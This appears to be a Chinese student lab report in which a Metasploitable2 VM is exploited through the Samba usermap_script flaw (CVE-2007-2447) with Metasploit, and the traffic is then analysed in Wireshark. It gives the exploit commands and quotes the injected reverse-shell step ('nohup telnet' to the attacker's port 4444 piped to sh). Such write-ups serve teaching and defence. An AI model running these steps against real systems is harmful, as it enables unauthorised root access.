20212924 2021-2022-2 《网络攻防实践》实践第9周（7次）报告

1.实践内容

Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个免费软件，由服务器及客户端程序构成。
NFS 与 samba 一样，也是在网络中实现文件共享的一种实现，但不幸的是，其不支持 windows 平台，samba 是能够在任何支持 SMB 协议的主机之间共享文件的一种实现，当然也包括 windows。
SMB 是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。
SMB 协议是 C/S 型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源

Username map script是Samba协议的一个漏洞，ID为CVE-2007-2447，属于远程命令注入漏洞，主要影响Samba的3.0.20到3.0.25rc3 版本。

139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘可能是最常见的问题。139属于TCP协议。

实验准备：
- 攻击机： kali（A）
- 靶机：Metasploitable2（B）
- 攻击目标漏洞：Samba服务usermap_script安全漏洞
- 适配器调整：VMnet8(NAT模式)
- 查看IP截图：
- 查看能否相互ping通截图：
操作如下：
（1）进入操作台：通过msfconsole指令进入操作台。
（2）进行相关设置：
- 通过search usermap_script查找漏洞信息
- 通过use exploit/multi/samba/usermap_script使用相关攻击脚本
- show payloads查看payload类型
- 使用set payload cmd/unix/reverse选择攻击PAYLOAD
- 使用set LHOST 192.168.200.6和set RHOST 192.168.200.123进行表示攻击机IP地址和靶机IP地址设置
（3）攻击：设置完成后，使用exploit进行攻击。
（4）验证：攻击完成后，根据提示操作得到远程shell，我们使用ifconfig查询靶机IP，靶机IP成功获取。通过和靶机ifconfig查询结果对比，IP相关信息无误。表明攻击成功。
（5）查看提权是否成功：通过id查看shell权限。再通过whoami查询，发现我们已经获得了root权限，而靶机仍然是非root账号登录，这表明提权成功。

攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

本任务选择攻击的漏洞为任务一所攻击漏洞，因此攻击操作与任务一相同
下面主要对Wireshark抓包内容进行分析。
- （1）Wireshark进行抓包，我们可以得到攻击者IP为192.168.200.6，目标IP为192.168.200.123，目标端口为139。经过查询可知139号端口是Unix中的Samba服务端口，可知攻击利用了Samba服务漏洞。攻击发起时间是从ARP协议的询问开始。
- （2）从第一个SMB数据包中分析数据流，找到shellcode如图所示。其中，nohup是no hang up的缩写，就是不挂断的意思，用nohup运行命令可以使命令永久的执行下去，和用户终端没有关系；telnet 192.168.200.6 4444表明数据是通过4444号通信端口管控传入攻击机的；sh是linux中运行shell的命令，是shell的解释器。
- （3）通过进一步的tcp流分析，我们可以看到成功之后在本地执行命令的信息。